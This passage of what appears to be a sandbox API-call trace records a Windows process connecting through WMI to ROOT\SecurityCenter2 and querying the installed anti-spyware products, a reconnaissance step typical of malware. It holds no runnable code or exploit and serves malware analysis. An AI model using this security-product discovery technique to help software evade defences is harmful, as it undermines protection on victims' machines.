ppvObject=0x36f050*=0x0) returned 0x80004002 [0215.915] WbemLocator:IClassFactory:CreateInstance (in: This=0x5e8dc40, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f05c | out: ppvObject=0x36f05c*=0x5e892d0) returned 0x0 [0215.915] WbemLocator:IUnknown:Release (This=0x5e8dc40) returned 0x0 [0215.915] WbemLocator:IUnknown:QueryInterface (in: This=0x5e892d0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ec7c | out: ppvObject=0x36ec7c*=0x5e892d0) returned 0x0 [0215.915] WbemLocator:IUnknown:QueryInterface (in: This=0x5e892d0, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36ec30 | out: ppvObject=0x36ec30*=0x0) returned 0x80004002 [0215.915] WbemLocator:IUnknown:AddRef (This=0x5e892d0) returned 0x3 [0215.915] WbemLocator:IUnknown:QueryInterface (in: This=0x5e892d0, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e58c | out: ppvObject=0x36e58c*=0x0) returned 0x80004002 [0215.915] WbemLocator:IUnknown:QueryInterface (in: This=0x5e892d0, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e53c | out: ppvObject=0x36e53c*=0x0) returned 0x80004002 [0215.916] WbemLocator:IUnknown:QueryInterface (in: This=0x5e892d0, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e548 | out: ppvObject=0x36e548*=0x0) returned 0x80004002 [0215.916] CoGetContextToken (in: pToken=0x36e5a8 | out: pToken=0x36e5a8) returned 0x0 [0215.916] CoGetContextToken (in: pToken=0x36e9bc | out: pToken=0x36e9bc) returned 0x0 [0215.916] WbemLocator:IUnknown:QueryInterface (in: This=0x5e892d0, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ea3c | out: ppvObject=0x36ea3c*=0x0) returned 0x80004002 [0215.916] WbemLocator:IUnknown:Release (This=0x5e892d0) returned 0x2 [0215.916] WbemLocator:IUnknown:Release (This=0x5e892d0) returned 0x1 [0215.916] CoGetContextToken (in: pToken=0x36f03c | out: pToken=0x36f03c) returned 0x0 [0215.916] CoGetContextToken (in: pToken=0x36ef9c | out: pToken=0x36ef9c) returned 0x0 [0215.916] WbemLocator:IUnknown:QueryInterface (in: This=0x5e892d0, riid=0x36f06c*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36f068 | out: ppvObject=0x36f068*=0x5e892d0) returned 0x0 [0215.916] WbemLocator:IUnknown:AddRef (This=0x5e892d0) returned 0x3 [0215.916] WbemLocator:IUnknown:Release (This=0x5e892d0) returned 0x2 [0215.916] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768f98, puCount=0x36f1f8 | out: puCount=0x36f1f8*=0x2) returned 0x0 [0215.916] WbemDefPath:IWbemPath:GetText (in: This=0x768f98, lFlags=8, puBuffLength=0x36f1f4*=0x0, pszText=0x0 | out: puBuffLength=0x36f1f4*=0x19, pszText=0x0) returned 0x0 [0215.916] WbemDefPath:IWbemPath:GetText (in: This=0x768f98, lFlags=8, puBuffLength=0x36f1f4*=0x19, pszText="000000000000000000000000" | out: puBuffLength=0x36f1f4*=0x19, pszText="\\\\.\\ROOT\\SecurityCenter2") returned 0x0 [0215.916] CoCreateInstance (in: rclsid=0x727c3734*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x727c3794*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x36f090 | out: ppv=0x36f090*=0x5e892b0) returned 0x0 [0215.916] WbemLocator:IWbemLocator:ConnectServer (in: This=0x5e892b0, strNetworkResource="\\\\.\\ROOT\\SecurityCenter2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x36f144 | out: ppNamespace=0x36f144*=0x793148) returned 0x0 [0216.054] WbemLocator:IUnknown:QueryInterface (in: This=0x793148, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36efb4 | out: ppvObject=0x36efb4*=0x7851b4) returned 0x0 [0216.054] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x7851b4, pProxy=0x793148, pAuthnSvc=0x36f004, pAuthzSvc=0x36f000, pServerPrincName=0x36eff8, pAuthnLevel=0x36effc, pImpLevel=0x36efec, pAuthInfo=0x36eff0, pCapabilites=0x36eff4 | out: pAuthnSvc=0x36f004*=0xa, pAuthzSvc=0x36f000*=0x0, pServerPrincName=0x36eff8, pAuthnLevel=0x36effc*=0x6, pImpLevel=0x36efec*=0x2, pAuthInfo=0x36eff0, pCapabilites=0x36eff4*=0x1) returned 0x0 [0216.054] WbemLocator:IUnknown:Release (This=0x7851b4) returned 0x1 [0216.054] WbemLocator:IUnknown:QueryInterface (in: This=0x793148, riid=0x727c35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36efa8 | out: ppvObject=0x36efa8*=0x7851d4) returned 0x0 [0216.054] WbemLocator:IUnknown:QueryInterface (in: This=0x793148, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ef94 | out: ppvObject=0x36ef94*=0x7851b4) returned 0x0 [0216.054] WbemLocator:IClientSecurity:SetBlanket (This=0x7851b4, pProxy=0x793148, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0216.054] WbemLocator:IUnknown:Release (This=0x7851b4) returned 0x2 [0216.054] WbemLocator:IUnknown:Release (This=0x7851d4) returned 0x1 [0216.054] CoTaskMemFree (pv=0x7940c8) [0216.054] WbemLocator:IUnknown:AddRef (This=0x793148) returned 0x2 [0216.054] WbemLocator:IUnknown:Release (This=0x5e892b0) returned 0x0 [0216.055] CoGetContextToken (in: pToken=0x36e4e8 | out: pToken=0x36e4e8) returned 0x0 [0216.055] CoGetContextToken (in: pToken=0x36e8fc | out: pToken=0x36e8fc) returned 0x0 [0216.055] WbemLocator:IUnknown:QueryInterface (in: This=0x793148, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e894 | out: ppvObject=0x36e894*=0x7851bc) returned 0x0 [0216.055] WbemLocator:IRpcOptions:Query (in: This=0x7851bc, pPrx=0x5e8dc88, dwProperty=2, pdwValue=0x36e988 | out: pdwValue=0x36e988) returned 0x80004002 [0216.055] WbemLocator:IUnknown:Release (This=0x7851bc) returned 0x2 [0216.055] CoGetContextToken (in: pToken=0x36eecc | out: pToken=0x36eecc) returned 0x0 [0216.055] CoGetContextToken (in: pToken=0x36ee2c | out: pToken=0x36ee2c) returned 0x0 [0216.055] WbemLocator:IUnknown:QueryInterface (in: This=0x793148, riid=0x36eefc*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x36edc8 | out: ppvObject=0x36edc8*=0x793148) returned 0x0 [0216.056] WbemLocator:IUnknown:Release (This=0x793148) returned 0x2 [0216.056] SysStringLen (param_1=0x0) returned 0x0 [0216.056] CoGetContextToken (in: pToken=0x36effc | out: pToken=0x36effc) returned 0x0 [0216.056] IWbemServices:ExecQuery (in: This=0x793148, strQueryLanguage="WQL", strQuery="SELECT * FROM AntiSpyWareProduct", lFlags=16, pCtx=0x0, ppEnum=0x36f204 | out: ppEnum=0x36f204*=0x70f9f0) returned 0x0 [0216.058] IUnknown:QueryInterface (in: This=0x70f9f0, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f05c | out: ppvObject=0x36f05c*=0x70f9f4) returned 0x0 [0216.059] IClientSecurity:QueryBlanket (in: This=0x70f9f4, pProxy=0x70f9f0, pAuthnSvc=0x36f0ac, pAuthzSvc=0x36f0a8, pServerPrincName=0x36f0a0, pAuthnLevel=0x36f0a4, pImpLevel=0x36f094, pAuthInfo=0x36f098, pCapabilites=0x36f09c | out: pAuthnSvc=0x36f0ac*=0xa, pAuthzSvc=0x36f0a8*=0x0, pServerPrincName=0x36f0a0, pAuthnLevel=0x36f0a4*=0x6, pImpLevel=0x36f094*=0x2, pAuthInfo=0x36f098, pCapabilites=0x36f09c*=0x1) returned 0x0 [0216.059] IUnknown:Release (This=0x70f9f4) returned 0x1 [0216.059] IUnknown:QueryInterface (in: This=0x70f9f0, riid=0x727c35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f050 | out: ppvObject=0x36f050*=0x784a54) returned 0x0 [0216.059] IUnknown:QueryInterface (in: This=0x70f9f0, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f03c | out: ppvObject=0x36f03c*=0x70f9f4) returned 0x0 [0216.059] IClientSecurity:SetBlanket (This=0x70f9f4, pProxy=0x70f9f0, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0216.060] IUnknown:Release (This=0x70f9f4) returned 0x2 [0216.060] WbemLocator:IUnknown:Release (This=0x784a54) returned 0x1 [0216.060] CoTaskMemFree (pv=0x793fa8) [0216.060] IUnknown:AddRef (This=0x70f9f0) returned 0x2 [0216.061] CoGetContextToken (in: pToken=0x36e57c | out: pToken=0x36e57c) returned 0x0 [0216.061] CoGetContextToken (in: pToken=0x36e98c | out: pToken=0x36e98c) returned 0x0 [0216.061] IUnknown:QueryInterface (in: This=0x70f9f0, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x784a3c) returned 0x0 [0216.061] WbemLocator:IRpcOptions:Query (in: This=0x784a3c, pPrx=0x5e8dc58, dwProperty=2, pdwValue=0x36ea1c | out: pdwValue=0x36ea1c) returned 0x80004002 [0216.062] WbemLocator:IUnknown:Release (This=0x784a3c) returned 0x2 [0216.062] CoGetContextToken (in: pToken=0x36ef5c | out: pToken=0x36ef5c) returned 0x0 [0216.062] CoGetContextToken (in: pToken=0x36eebc | out: pToken=0x36eebc) returned 0x0 [0216.062] IUnknown:QueryInterface (in: This=0x70f9f0, riid=0x36ef8c*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x36ee58 | out: ppvObject=0x36ee58*=0x70f9f0) returned 0x0 [0216.062] IUnknown:Release (This=0x70f9f0) returned 0x2 [0216.062] SysStringLen (param_1=0x0) returned 0x0 [0216.062] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768f98, puCount=0x36f250 | out: puCount=0x36f250*=0x2) returned 0x0 [0216.062] WbemDefPath:IWbemPath:GetText (in: This=0x768f98, lFlags=4, puBuffLength=0x36f24c*=0x0, pszText=0x0 | out: puBuffLength=0x36f24c*=0x19, pszText=0x0) returned 0x0 [0216.062] WbemDefPath:IWbemPath:GetText (in: This=0x768f98, lFlags=4, puBuffLength=0x36f24c*=0x19, pszText="000000000000000000000000" | out: puBuffLength=0x36f24c*=0x19, pszText="\\\\.\\ROOT\\SecurityCenter2") returned 0x0 [0216.062] CoGetContextToken (in: pToken=0x36f0a4 | out: pToken=0x36f0a4) returned 0x0 [0216.062] IEnumWbemClassObject:Clone (in: This=0x70f9f0, ppEnum=0x36f25c | out: ppEnum=0x36f25c*=0x70fab8) returned 0x0 [0216.063] IUnknown:QueryInterface (in: This=0x70fab8, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f118 | out: ppvObject=0x36f118*=0x70fabc) returned 0x0 [0216.063] IClientSecurity:QueryBlanket (in: This=0x70fabc, pProxy=0x70fab8, pAuthnSvc=0x36f168, pAuthzSvc=0x36f164, pServerPrincName=0x36f15c, pAuthnLevel=0x36f160, pImpLevel=0x36f150, pAuthInfo=0x36f154, pCapabilites=0x36f158 | out: pAuthnSvc=0x36f168*=0xa, pAuthzSvc=0x36f164*=0x0, pServerPrincName=0x36f15c, pAuthnLevel=0x36f160*=0x6, pImpLevel=0x36f150*=0x2, pAuthInfo=0x36f154, pCapabilites=0x36f158*=0x1) returned 0x0 [0216.063] IUnknown:Release (This=0x70fabc) returned 0x1 [0216.063] IUnknown:QueryInterface (in: This=0x70fab8, riid=0x727c35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f10c | out: ppvObject=0x36f10c*=0x7853b4) returned 0x0 [0216.063] IUnknown:QueryInterface (in: This=0x70fab8, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f0f8 | out: ppvObject=0x36f0f8*=0x70fabc) returned 0x0 [0216.064] IClientSecurity:SetBlanket (This=0x70fabc, pProxy=0x70fab8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0216.065] IUnknown:Release (This=0x70fabc) returned 0x2 [0216.065] WbemLocator:IUnknown:Release (This=0x7853b4) returned 0x1 [0216.065] CoTaskMemFree (pv=0x7940f8) [0216.065] IUnknown:AddRef (This=0x70fab8) returned 0x2 [0216.066] CoGetContextToken (in: pToken=0x36e628 | out: pToken=0x36e628) returned 0x0 [0216.066] CoGetContextToken (in: pToken=0x36ea3c | out: pToken=0x36ea3c) returned 0x0 [0216.066] IUnknown:QueryInterface (in: This=0x70fab8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e9d4 | out: ppvObject=0x36e9d4*=0x78539c) returned 0x0 [0216.066] WbemLocator:IRpcOptions:Query (in: This=0x78539c, pPrx=0x5e8dd18, dwProperty=2, pdwValue=0x36eac8 | out: pdwValue=0x36eac8) returned 0x80004002 [0216.066] WbemLocator:IUnknown:Release (This=0x78539c) returned 0x2 [0216.066] CoGetContextToken (in: pToken=0x36f00c | out: pToken=0x36f00c) returned 0x0 [0216.066] CoGetContextToken (in: pToken=0x36ef6c | out: pToken=0x36ef6c) returned 0x0 [0216.066] IUnknown:QueryInterface (in: This=0x70fab8, riid=0x36f03c*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x36ef08 | out: ppvObject=0x36ef08*=0x70fab8) returned 0x0 [0216.066] IUnknown:Release (This=0x70fab8) returned 0x2 [0216.066] SysStringLen (param_1=0x0) returned 0x0 [0216.067] IEnumWbemClassObject:Reset (This=0x70fab8) returned 0x0 [0216.067] CoTaskMemAlloc (cb=0x4) returned 0x5e89340 [0216.067] IEnumWbemClassObject:Next (in: This=0x70fab8, lTimeout=-1, uCount=0x1, apObjects=0x5e89340, puReturned=0x246deb0 | out: apObjects=0x5e89340*=0x5e8fdf8, puReturned=0x246deb0*=0x1) returned 0x0 [0216.068] IUnknown:QueryInterface (in: This=0x5e8fdf8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e8b4 | out: ppvObject=0x36e8b4*=0x5e8fdf8) returned 0x0 [0216.068] IUnknown:QueryInterface (in: This=0x5e8fdf8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e868 | out: ppvObject=0x36e868*=0x0) returned 0x80004002 [0216.068] IUnknown:QueryInterface (in: This=0x5e8fdf8, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e690 | out: ppvObject=0x36e690*=0x0) returned 0x80004002 [0216.069] IUnknown:AddRef (This=0x5e8fdf8) returned 0x3 [0216.069] IUnknown:QueryInterface (in: This=0x5e8fdf8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e1c4 | out: ppvObject=0x36e1c4*=0x0) returned 0x80004002 [0216.069] IUnknown:QueryInterface (in: This=0x5e8fdf8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e174 | out: ppvObject=0x36e174*=0x0) returned 0x80004002 [0216.069] IUnknown:QueryInterface (in: This=0x5e8fdf8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e180 | out: ppvObject=0x36e180*=0x5e8fdfc) returned 0x0 [0216.069] IMarshal:GetUnmarshalClass (in: This=0x5e8fdfc, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e188 | out: pCid=0x36e188*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0216.069] IUnknown:Release (This=0x5e8fdfc) returned 0x3 [0216.069] CoGetContextToken (in: pToken=0x36e1e0 | out: pToken=0x36e1e0) returned 0x0 [0216.069] CoGetContextToken (in: pToken=0x36e5f4 | out: pToken=0x36e5f4) returned 0x0 [0216.069] IUnknown:QueryInterface (in: This=0x5e8fdf8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e674 | out: ppvObject=0x36e674*=0x0) returned 0x80004002 [0216.069] IUnknown:Release (This=0x5e8fdf8) returned 0x2 [0216.069] CoGetContextToken (in: pToken=0x36ebdc | out: pToken=0x36ebdc) returned 0x0 [0216.069] CoGetContextToken (in: pToken=0x36eb3c | out: pToken=0x36eb3c) returned 0x0 [0216.069] IUnknown:QueryInterface (in: This=0x5e8fdf8, riid=0x36ec0c*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36ec08 | out: ppvObject=0x36ec08*=0x5e8fdf8) returned 0x0 [0216.069] IUnknown:AddRef (This=0x5e8fdf8) returned 0x4 [0216.069] IUnknown:Release (This=0x5e8fdf8) returned 0x3 [0216.069] IUnknown:Release (This=0x5e8fdf8) returned 0x2 [0216.069] CoTaskMemFree (pv=0x5e89340) [0216.070] CoGetContextToken (in: pToken=0x36ef4c | out: pToken=0x36ef4c) returned 0x0 [0216.070] IUnknown:AddRef (This=0x5e8fdf8) returned 0x3 [0216.070] IWbemClassObject:Get (in: This=0x5e8fdf8, wszName="__GENUS", lFlags=0, pVal=0x36f24c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f2cc*=0, plFlavor=0x36f2c8*=0 | out: pVal=0x36f24c*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f2cc*=3, plFlavor=0x36f2c8*=64) returned 0x0 [0216.070] IWbemClassObject:Get (in: This=0x5e8fdf8, wszName="__PATH", lFlags=0, pVal=0x36f230*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f2b4*=0, plFlavor=0x36f2b0*=0 | out: pVal=0x36f230*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\ROOT\\SecurityCenter2:AntiSpywareProduct.instanceGuid=\"{D68DDC3A-831F-4fae-9E44-DA132C1ACF46}\"", varVal2=0x0), pType=0x36f2b4*=8, plFlavor=0x36f2b0*=64) returned 0x0 [0216.070] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\ROOT\\SecurityCenter2:AntiSpywareProduct.instanceGuid=\"{D68DDC3A-831F-4fae-9E44-DA132C1ACF46}\"") returned 0xd4 [0216.070] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\ROOT\\SecurityCenter2:AntiSpywareProduct.instanceGuid=\"{D68DDC3A-831F-4fae-9E44-DA132C1ACF46}\"") returned 0xd4 [0216.070] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f25c | out: ppv=0x36f25c*=0x6ee4bc) returned 0x0 [0216.070] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f254 | out: pAptType=0x36f254*=1) returned 0x0 [0216.070] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f258 | out: ppvObject=0x36f258*=0x0) returned 0x80004002 [0216.070] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0216.071] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36ebc8 | out: ppv=0x36ebc8*=0x5e89340) returned 0x0 [0216.071] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e89340, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ede0 | out: ppvObject=0x36ede0*=0x0) returned 0x80004002 [0216.071] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5e89340, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36edec | out: ppvObject=0x36edec*=0x769008) returned 0x0 [0216.072] WbemDefPath:IUnknown:Release (This=0x5e89340) returned 0x0 [0216.072] WbemDefPath:IUnknown:QueryInterface (in: This=0x769008, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ea0c | out: ppvObject=0x36ea0c*=0x769008) returned 0x0 [0216.072] WbemDefPath:IUnknown:QueryInterface (in: This=0x769008, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e9c0 | out: ppvObject=0x36e9c0*=0x0) returned 0x80004002 [0216.072] WbemDefPath:IUnknown:AddRef (This=0x769008) returned 0x3 [0216.072] WbemDefPath:IUnknown:QueryInterface (in: This=0x769008, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e31c | out: ppvObject=0x36e31c*=0x0) returned 0x80004002 [0216.072] WbemDefPath:IUnknown:QueryInterface (in: This=0x769008, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e2cc | out: ppvObject=0x36e2cc*=0x0) returned 0x80004002 [0216.072] WbemDefPath:IUnknown:QueryInterface (in: This=0x769008, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e2d8 | out: ppvObject=0x36e2d8*=0x5e89350) returned 0x0 [0216.072] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5e89350, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e2e0 | out: pCid=0x36e2e0*(Data1=0x33a, Data2=0x0, Data3=0x0, 